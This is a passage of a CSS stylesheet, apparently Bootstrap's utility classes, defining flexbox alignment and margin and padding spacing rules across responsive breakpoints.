!important; } .align-self-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } @media (min-width: 576px) { .flex-sm-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-sm-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-sm-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-sm-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-sm-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-sm-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-sm-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-sm-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-sm-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-sm-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-sm-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-sm-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-sm-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-sm-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-sm-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-sm-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-sm-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-sm-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-sm-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-sm-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-sm-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-sm-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-sm-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-sm-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-sm-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-sm-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-sm-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-sm-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-sm-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-sm-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-sm-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-sm-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-sm-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-sm-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 768px) { .flex-md-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-md-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-md-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-md-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-md-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-md-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-md-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-md-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-md-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-md-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-md-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-md-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-md-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-md-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-md-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-md-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-md-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-md-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-md-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-md-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-md-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-md-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-md-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-md-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-md-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-md-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-md-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-md-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-md-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-md-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-md-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-md-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-md-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-md-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 992px) { .flex-lg-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-lg-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-lg-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-lg-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-lg-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-lg-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-lg-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-lg-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-lg-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-lg-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-lg-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-lg-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-lg-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-lg-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-lg-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-lg-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-lg-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-lg-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-lg-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-lg-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-lg-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-lg-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-lg-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-lg-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-lg-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-lg-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-lg-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-lg-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-lg-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-lg-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-lg-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-lg-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-lg-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-lg-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } @media (min-width: 1200px) { .flex-xl-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-xl-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-xl-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-xl-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-xl-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-xl-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-xl-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-xl-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-xl-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-xl-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-xl-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-xl-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-xl-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-xl-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-xl-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-xl-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-xl-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-xl-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-xl-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-xl-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-xl-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-xl-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-xl-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-xl-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-xl-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-xl-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-xl-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-xl-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-xl-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-xl-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-xl-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-xl-center { -ms-flex-item-align: center !important; align-self: center !important; } .align-self-xl-baseline { -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-xl-stretch { -ms-flex-item-align: stretch !important; align-self: stretch !important; } } .m-0 { margin: 0 !important; } .mt-0, .my-0 { margin-top: 0 !important; } .mr-0, .mx-0 { margin-right: 0 !important; } .mb-0, .my-0 { margin-bottom: 0 !important; } .ml-0, .mx-0 { margin-left: 0 !important; } .m-1 { margin: 0.25rem !important; } .mt-1, .my-1 { margin-top: 0.25rem !important; } .mr-1, .mx-1 { margin-right: 0.25rem !important; } .mb-1, .my-1 { margin-bottom: 0.25rem !important; } .ml-1, .mx-1 { margin-left: 0.25rem !important; } .m-2 { margin: 0.5rem !important; } .mt-2, .my-2 { margin-top: 0.5rem !important; } .mr-2, .mx-2 { margin-right: 0.5rem !important; } .mb-2, .my-2 { margin-bottom: 0.5rem !important; } .ml-2, .mx-2 { margin-left: 0.5rem !important; } .m-3 { margin: 1rem !important; } .mt-3, .my-3 { margin-top: 1rem !important; } .mr-3, .mx-3 { margin-right: 1rem !important; } .mb-3, .my-3 { margin-bottom: 1rem !important; } .ml-3, .mx-3 { margin-left: 1rem !important; } .m-4 { margin: 1.5rem !important; } .mt-4, .my-4 { margin-top: 1.5rem !important; } .mr-4, .mx-4 { margin-right: 1.5rem !important; } .mb-4, .my-4 { margin-bottom: 1.5rem !important; } .ml-4, .mx-4 { margin-left: 1.5rem !important; } .m-5 { margin: 3rem !important; } .mt-5, .my-5 { margin-top: 3rem !important; } .mr-5, .mx-5 { margin-right: 3rem !important; } .mb-5, .my-5 { margin-bottom: 3rem !important; } .ml-5, .mx-5 { margin-left: 3rem !important; } .p-0 { padding: 0 !important; } .pt-0, .py-0 { padding-top: 0 !important; } .pr-0, .px-0 { padding-right: 0 !important; } .pb-0, .py-0 { padding-bottom: 0 !important; } .pl-0, .px-0 { padding-left: 0 !important; } .p-1 { padding: 0.25rem !important; } .pt-1, .py-1 { padding-top: 0.25rem !important; } .pr-1, .px-1 { padding-right: 0.25rem !important; } .pb-1, .py-1 { padding-bottom: 0.25rem !important; } .pl-1, .px-1 { padding-left: 0.25rem !important; } .p-2 { padding: 0.5rem !important; } .pt-2, .py-2 { padding-top: 0.5rem !important; } .pr-2, .px-2 { padding-right: 0.5rem !important; } .pb-2, .py-2 { padding-bottom: 0.5rem !important; } .pl-2, .px-2 { padding-left: 0.5rem !important; } .p-3 { padding: 1rem !important; } .pt-3, .py-3 { padding-top: 1rem !important; } .pr-3, .px-3 { padding-right: 1rem !important; } .pb-3, .py-3 { padding-bottom: 1rem !important; } .pl-3, .px-3 { padding-left: 1rem !important; } .p-4 { padding: 1.5rem !important; } .pt-4, .py-4 { padding-top: 1.5rem !important; } .pr-4, .px-4 { padding-right: 1.5rem !important; } .pb-4, .py-4 { padding-bottom: 1.5rem !important; } .pl-4, .px-4 { padding-left: 1.5rem !important; } .p-5 { padding: 3rem !important; } .pt-5, .py-5 { padding-top: 3rem !important; } .pr-5, .px-5 { padding-right: 3rem !important; } .pb-5, .py-5 { padding-bottom: 3rem !important; } .pl-5, .px-5 { padding-left: 3rem !important; } .m-n1 { margin: -0.25rem !important; } .mt-n1, .my-n1 { margin-top: -0.25rem !important; } .mr-n1, .mx-n1 { margin-right: -0.25rem !important; } .mb-n1, .my-n1 { margin-bottom: -0.25rem !important; } .ml-n1, .mx-n1 { margin-left: -0.25rem !important; } .m-n2 { margin: -0.5rem !important; } .mt-n2, .my-n2 { margin-top: -0.5rem !important; } .mr-n2, .mx-n2 { margin-right: -0.5rem !important; } .mb-n2, .my-n2 { margin-bottom: -0.5rem !important; } .ml-n2, .mx-n2 { margin-left: -0.5rem !important; } .m-n3 { margin: -1rem !important; } .mt-n3, .my-n3 { margin-top: -1rem !important; } .mr-n3, .mx-n3 { margin-right: -1rem !important; } .mb-n3, .my-n3 { margin-bottom: -1rem !important; } .ml-n3, .mx-n3 { margin-left: -1rem !important; } .m-n4 { margin: -1.5rem !important; } .mt-n4, .my-n4 { margin-top: -1.5rem !important; } .mr-n4, .mx-n4 { margin-right: -1.5rem !important; } .mb-n4, .my-n4 { margin-bottom: -1.5rem !important; } .ml-n4, .mx-n4 { margin-left: -1.5rem !important; } .m-n5 { margin: -3rem !important; } .mt-n5, .my-n5 { margin-top: -3rem !important; } .mr-n5, .mx-n5 { margin-right: -3rem !important; } .mb-n5, .my-n5 { margin-bottom: -3rem !important; } .ml-n5, .mx-n5 { margin-left: -3rem !important; } .m-auto { margin: auto !important; } .mt-auto, .my-auto { margin-top: auto !important; } .mr-auto, .mx-auto { margin-right: auto !important; } .mb-auto, .my-auto { margin-bottom: auto !important; } .ml-auto, .mx-auto { margin-left: auto !important; } @media (min-width: 576px) { .m-sm-0 { margin: 0 !important; } .mt-sm-0, .my-sm-0 { margin-top: 0 !important; } .mr-sm-0, .mx-sm-0 { margin-right: 0 !important; } .mb-sm-0, .my-sm-0 { margin-bottom: 0 !important; } .ml-sm-0, .mx-sm-0 { margin-left: 0 !important; } .m-sm-1 { margin: 0.25rem !important; } .mt-sm-1, .my-sm-1 { margin-top: 0.25rem !important; } .mr-sm-1, .mx-sm-1 { margin-right: 0.25rem !important; } .mb-sm-1, .my-sm-1 { margin-bottom: 0.25rem !important; } .ml-sm-1, .mx-sm-1 { margin-left: 0.25rem !important; } .m-sm-2 { margin: 0.5rem !important; } .mt-sm-2, .my-sm-2 { margin-top: 0.5rem !important; } .mr-sm-2, .mx-sm-2 { margin-right: 0.5rem !important; } .mb-sm-2, .my-sm-2 { margin-bottom: 0.5rem !important; } .ml-sm-2, .mx-sm-2 { margin-left: 0.5rem !important; } .m-sm-3 { margin: 1rem !important; } .mt-sm-3, .my-sm-3 { margin-top: 1rem !important; } .mr-sm-3, .mx-sm-3 { margin-right: 1rem !important; } .mb-sm-3, .my-sm-3 { margin-bottom: 1rem !important; } .ml-sm-3, .mx-sm-3 { margin-left: 1rem !important; } .m-sm-4 { margin: 1.5rem !important; } .mt-sm-4, .my-sm-4 { margin-top: 1.5rem !important; } .mr-sm-4, .mx-sm-4 { margin-right: 1.5rem !important; } .mb-sm-4, .my-sm-4 { margin-bottom: 1.5rem !important; } .ml-sm-4, .mx-sm-4 { margin-left: 1.5rem !important; } .m-sm-5 { margin: 3rem !important; } .mt-sm-5, .my-sm-5 { margin-top: 3rem !important; } .mr-sm-5, .mx-sm-5 { margin-right: 3rem !important; } .mb-sm-5, .my-sm-5 { margin-bottom: 3rem !important; } .ml-sm-5, .mx-sm-5 { margin-left: 3rem !important; } .p-sm-0 { padding: 0 !important; } .pt-sm-0, .py-sm-0 { padding-top: 0 !important; } .pr-sm-0, .px-sm-0 { padding-right: 0 !important; } .pb-sm-0, .py-sm-0 { padding-bottom: 0 !important; } .pl-sm-0, .px-sm-0 { padding-left: 0 !important; } .p-sm-1 { padding: 0.25rem !important; } .pt-sm-1, .py-sm-1 { padding-top: 0.25rem !important; } .pr-sm-1, .px-sm-1 { padding-right: 0.25rem !important; } .pb-sm-1, .py-sm-1 { padding-bottom: 0.25rem !important; } .pl-sm-1, .px-sm-1 { padding-left: 0.25rem !important; } .p-sm-2 { padding: 0.5rem !important; } .pt-sm-2, .py-sm-2 { padding-top: 0.5rem !important; } .pr-sm-2, .px-sm-2 { padding-right: 0.5rem !important; } .pb-sm-2, .py-sm-2 { padding-bottom: 0.5rem !important; } .pl-sm-2, .px-sm-2 { padding-left: 0.5rem !important; } .p-sm-3 { padding: 1rem !important; } .pt-sm-3, .py-sm-3 { padding-top: 1rem !important; } .pr-sm-3, .px-sm-3 { padding-right: 1rem !important; } .pb-sm-3, .py-sm-3 { padding-bottom: 1rem !important; } .pl-sm-3, .px-sm-3 { padding-left: 1rem !important; } .p-sm-4 { padding: 1.5rem !important; } .pt-sm-4, .py-sm-4 { padding-top: 1.5rem !important; } .pr-sm-4, .px-sm-4 { padding-right: 1.5rem !important; } .pb-sm-4, .py-sm-4 { padding-bottom: 1.5rem !important; } .pl-sm-4, .px-sm-4 { padding-left: 1.5rem !important; } .p-sm-5 { padding: 3rem !important; } .pt-sm-5, .py-sm-5 { padding-top: 3rem !important; } .pr-sm-5, .px-sm-5 { padding-right: 3rem !important; } .pb-sm-5, .py-sm-5 { padding-bottom: 3rem !important; } .pl-sm-5, .px-sm-5 { padding-left: 3rem !important; } .m-sm-n1 { margin: -0.25rem !important; } .mt-sm-n1, .my-sm-n1 { margin-top: -0.25rem !important; } .mr-sm-n1, .mx-sm-n1 { margin-right: -0.25rem !important; } .mb-sm-n1, .my-sm-n1 { margin-bottom: -0.25rem !important; } .ml-sm-n1, .mx-sm-n1 { margin-left: -0.25rem !important; } .m-sm-n2 { margin: -0.5rem !important; } .mt-sm-n2, .my-sm-n2 { margin-top: -0.5rem !important; } .mr-sm-n2, .mx-sm-n2 { margin-right: -0.5rem !important; } .mb-sm-n2, .my-sm-n2 { margin-bottom: -0.5rem !important; } .ml-sm-n2, .mx-sm-n2 { margin-left: -0.5rem !important; } .m-sm-n3 { margin: -1rem !important; } .mt-sm-n3, .my-sm-n3 { margin-top: -1rem !important; } .mr-sm-n3, .mx-sm-n3 { margin-right: -1rem !important; } .mb-sm-n3, .my-sm-n3 { margin-bottom: -1rem !important; } .ml-sm-n3, .mx-sm-n3 { margin-left: -1rem !important; } .m-sm-n4 { margin: -1.5rem !important; } .mt-sm-n4, .my-sm-n4 { margin-top: -1.5rem !important; } .mr-sm-n4, .mx-sm-n4 { margin-right: -1.5rem !important; } .mb-sm-n4, .my-sm-n4 { margin-bottom: -1.5rem !important; } .ml-sm-n4, .mx-sm-n4 { margin-left: -1.5rem !important; } .m-sm-n5 { margin: -3rem !important; } .mt-sm-n5, .my-sm-n5 { margin-top: -3rem !important; } .mr-sm-n5, .mx-sm-n5 { margin-right: -3rem !important; } .mb-sm-n5, .my-sm-n5 { margin-bottom: -3rem !important; } .ml-sm-n5, .mx-sm-n5 { margin-left: -3rem !important; } .m-sm-auto { margin: auto !important; } .mt-sm-auto, .my-sm-auto { margin-top: auto !important; } .mr-sm-auto, .mx-sm-auto { margin-right: auto !important; } .mb-sm-auto, .my-sm-auto { margin-bottom: auto !important; } .ml-sm-auto, .mx-sm-auto { margin-left: auto !important; } } @media (min-width: 768px) { .m-md-0 { margin: 0 !important; } .mt-md-0, .my-md-0 { margin-top: 0 !important; } .mr-md-0, .mx-md-0 { margin-right: 0 !important; } .mb-md-0, .my-md-0 { margin-bottom: 0 !important; } .ml-md-0, .mx-md-0 { margin-left: 0 !important; } .m-md-1 { margin: 0.25rem !important; } .mt-md-1, .my-md-1 { margin-top: 0.25rem !important; } .mr-md-1, .mx-md-1 { margin-right: 0.25rem !important; } .mb-md-1, .my-md-1 { margin-bottom: 0.25rem !important; } .ml-md-1, .mx-md-1 { margin-left: 0.25rem !important; } .m-md-2 { margin: 0.5rem !important; } .mt-md-2, .my-md-2 { margin-top: 0.5rem !important; } .mr-md-2, .mx-md-2 { margin-right: 0.5rem !important; } .mb-md-2, .my-md-2 { margin-bottom: 0.5rem !important; } .ml-md-2, .mx-md-2 { margin-left: 0.5rem !important; } .m-md-3 { margin: 1rem !important; } .mt-md-3, .my-md-3 { margin-top: 1rem !important; } .mr-md-3, .mx-md-3 { margin-right: 1rem !important; } .mb-md-3, .my-md-3 { margin-bottom: 1rem !important; } .ml-md-3, .mx-md-3 { margin-left: 1rem !important; } .m-md-4 { margin: 1.5rem !important; } .mt-md-4, .my-md-4 { margin-top: 1.5rem !important; } .mr-md-4, .mx-md-4 { margin-right: 1.5rem !important; } .mb-md-4, .my-md-4 { margin-bottom: 1.5rem !important; } .ml-md-4, .mx-md-4 { margin-left: 1.5rem !important; } .m-md-5 { margin: 3rem !important; } .mt-md-5, .my-md-5 { margin-top: 3rem !important; } .mr-md-5, .mx-md-5 { margin-right: 3rem !important; } .mb-md-5, .my-md-5 { margin-bottom: 3rem !important; } .ml-md-5, .mx-md-5 { margin-left: 3rem !important; } .p-md-0 { padding: 0 !important; } .pt-md-0, .py-md-0 { padding-top: 0 !important; } .pr-md-0, .px-md-0 { padding-right: 0 !important; } .pb-md-0, .py-md-0 { padding-bottom: 0 !important; } .pl-md-0, .px-md-0 { padding-left: 0 !important; } .p-md-1 { padding: 0.25rem !important; } .pt-md-1, .py-md-1 { padding-top: 0.25rem !important; } .pr-md-1, .px-md-1 { padding-right: 0.25rem !important; } .pb-md-1, .py-md-1 { padding-bottom: 0.25rem !important; } .pl-md-1, .px-md-1 { padding-left: 0.25rem !important; } .p-md-2 { padding: 0.5rem !important; } .pt-md-2, .py-md-2 { padding-top: 0.5rem !important; } .pr-md-2, .px-md-2 { padding-right: 0.5rem !important; } .pb-md-2, .py-md-2 { padding-bottom: 0.5rem !important; } .pl-md-2, .px-md-2 { padding-left: 0.5rem !important; } .p-md-3 { padding: 1rem !important; } .pt-md-3, .py-md-3 { padding-top: 1rem !important; } .pr-md-3, .px-md-3 { padding-right: 1rem !important; } .pb-md-3, .py-md-3 { padding-bottom: 1rem !important; } .pl-md-3, .px-md-3 { padding-left: 1rem !important; } .p-md-4 { padding: 1.5rem !important; } .pt-md-4, .py-md-4 { padding-top: 1.5rem !important; } .pr-md-4, .px-md-4 { padding-right: 1.5rem !important; } .pb-md-4, .py-md-4 { padding-bottom: 1.5rem !important; } .pl-md-4, .px-md-4 { padding-left: 1.5rem !important; } .p-md-5 { padding: 3rem !important; } .pt-md-5, .py-md-5 { padding-top: 3rem !important; } .pr-md-5, .px-md-5 { padding-right: 3rem !important; } .pb-md-5, .py-md-5 { padding-bottom: 3rem !important; } .pl-md-5, .px-md-5 { padding-left: 3rem !important; } .m-md-n1 { margin: -0.25rem !important; } .mt-md-n1, .my-md-n1 { margin-top: -0.25rem !important; } .mr-md-n1, .mx-md-n1 { margin-right: -0.25rem !important; } .mb-md-n1, .my-md-n1 { margin-bottom: -0.25rem !important; } .ml-md-n1, .mx-md-n1 { margin-left: -0.25rem !important; } .m-md-n2 { margin: -0.5rem !important; } .mt-md-n2, .my-md-n2 { margin-top: -0.5rem !important; } .mr-md-n2, .mx-md-n2 { margin-right: -0.5rem !important; } .mb-md-n2, .my-md-n2 { margin-bottom: -0.5rem !important; } .ml-md-n2, .mx-md-n2 { margin-left: -0.5rem !important; } .m-md-n3 { margin: -1rem !important; } .mt-md-n3, .my-md-n3 { margin-top: -1rem !important; } .mr-md-n3, .mx-md-n3 { margin-right: -1rem !important; } .mb-md-n3, .my-md-n3 { margin-bottom: -1rem !important; } .ml-md-n3, .mx-md-n3 { margin-left: -1rem !important; } .m-md-n4 { margin: -1.5rem !important; } .mt-md-n4, .my-md-n4 { margin-top: -1.5rem !important; } .mr-md-n4, .mx-md-n4 { margin-right: -1.5rem !important; } .mb-md-n4, .my-md-n4 { margin-bottom: -1.5rem !important; } .ml-md-n4, .mx-md-n4 { margin-left: -1.5rem !important; } .m-md-n5 { margin: -3rem !important; } .mt-md-n5, .my-md-n5 { margin-top: -3rem !important; } .mr-md-n5, .mx-md-n5 { margin-right: -3rem !important; } .mb-md-n5, .my-md-n5 { margin-bottom: -3rem !important; } .ml-md-n5, .mx-md-n5 { margin-left: -3rem !important; } .m-md-auto { margin: auto !important; } .mt-md-auto, .my-md-auto { margin-top: auto !important; } .mr-md-auto, .mx-md-auto { margin-right: auto !important; } .mb-md-auto, .my-md-auto { margin-bottom: auto !important; } .ml-md-auto, .mx-md-auto { margin-left: auto !important; } } @media (min-width: 992px) { .m-lg-0 { margin: 0 !important; } .mt-lg-0, .my-lg-0 { margin-top: 0 !important; } .mr-lg-0, .mx-lg-0 { margin-right: 0 !important; } .mb-lg-0, .my-lg-0 { margin-bottom: 0 !important; } .ml-lg-0, .mx-lg-0 { margin-left: 0 !important; } .m-lg-1 { margin: 0.25rem !important; } .mt-lg-1, .my-lg-1 { margin-top: 0.25rem !important; } .mr-lg-1, .mx-lg-1 { margin-right: 0.25rem !important; } .mb-lg-1, .my-lg-1 { margin-bottom: 0.25rem !important; } .ml-lg-1, .mx-lg-1 { margin-left: 0.25rem !important; } .m-lg-2 { margin: 0.5rem !important; } .mt-lg-2, .my-lg-2 { margin-top: 0.5rem !important; } .mr-lg-2, .mx-lg-2 { margin-right: 0.5rem !important; } .mb-lg-2, .my-lg-2 { margin-bottom: 0.5rem !important; } .ml-lg-2, .mx-lg-2 { margin-left: 0.5rem !important; } .m-lg-3 { margin: 1rem !important; } .mt-lg-3, .my-lg-3 { margin-top: 1rem !important; } .mr-lg-3, .mx-lg-3 { margin-right: 1rem !important; } .mb-lg-3, .my-lg-3 { margin-bottom: 1rem !important; } .ml-lg-3, .mx-lg-3 { margin-left: 1rem !important; } .m-lg-4 { margin: 1.5rem !important; } .mt-lg-4, .my-lg-4 { margin-top: 1.5rem !important; } .mr-lg-4, .mx-lg-4 { margin-right: 1.5rem !important; } .mb-lg-4, .my-lg-4 { margin-bottom: 1.5rem !important; } .ml-lg-4, .mx-lg-4 { margin-left: 1.5rem !important; } .m-lg-5 { margin: 3rem !important; } .mt-lg-5, .my-lg-5 { margin-top: 3rem !important; } .mr-lg-5, .mx-lg-5 { margin-right: 3rem !important; } .mb-lg-5, .my-lg-5 { margin-bottom: 3rem !important; } .ml-lg-5, .mx-lg-5 { margin-left: 3rem !important; } .p-lg-0 { padding: 0 !important; } .pt-lg-0, .py-lg-0 { padding-top: 0 !important; } .pr-lg-0, .px-lg-0 { padding-right: 0 !important; } .pb-lg-0, .py-lg-0 { padding-bottom: 0 !important; } .pl-lg-0, .px-lg-0 { padding-left: 0 !important; } .p-lg-1 { padding: 0.25rem !important; } .pt-lg-1, .py-lg-1 { padding-top: 0.25rem !important; } .pr-lg-1, .px-lg-1 { padding-right: 0.25rem !important; } .pb-lg-1, .py-lg-1 { padding-bottom: 0.25rem !important; } .pl-lg-1, .px-lg-1 { padding-left: 0.25rem !important; } .p-lg-2 { padding: 0.5rem !important; } .pt-lg-2, .py-lg-2 { padding-top: 0.5rem !important; } .pr-lg-2, .px-lg-2 { padding-right: 0.5rem !important; } .pb-lg-2, .py-lg-2 { padding-bottom: 0.5rem !important; } .pl-lg-2, .px-lg-2 { padding-left: 0.5rem !important; } .p-lg-3 { padding: 1rem !important; } .pt-lg-3, .py-lg-3 { padding-top: 1rem !important; } .pr-lg-3, .px-lg-3 { padding-right: 1rem !important; } .pb-lg-3, .py-lg-3 { padding-bottom: 1rem !important; } .pl-lg-3, .px-lg-3 { padding-left: 1rem !important; } .p-lg-4 { padding: 1.5rem !important; } .pt-lg-4, .py-lg-4 { padding-top: 1.5rem !important; } .pr-lg-4, .px-lg-4 { padding-right: 1.5rem !important; } .pb-lg-4, .py-lg-4 { padding-bottom: 1.5rem !important; } .pl-lg-4, .px-lg-4 { padding-left: 1.5rem !important; } .p-lg-5 { padding: 3rem !important; } .pt-lg-5, .py-lg-5 { padding-top: 3rem !important; } .pr-lg-5, .px-lg-5 { padding-right: 3rem !important; } .pb-lg-5, .py-lg-5 { padding-bottom: 3rem !important; } .pl-lg-5, .px-lg-5 { padding-left: 3rem !important; } .m-lg-n1 { margin: -0.25rem !important; } .mt-lg-n1, .my-lg-n1 { margin-top: 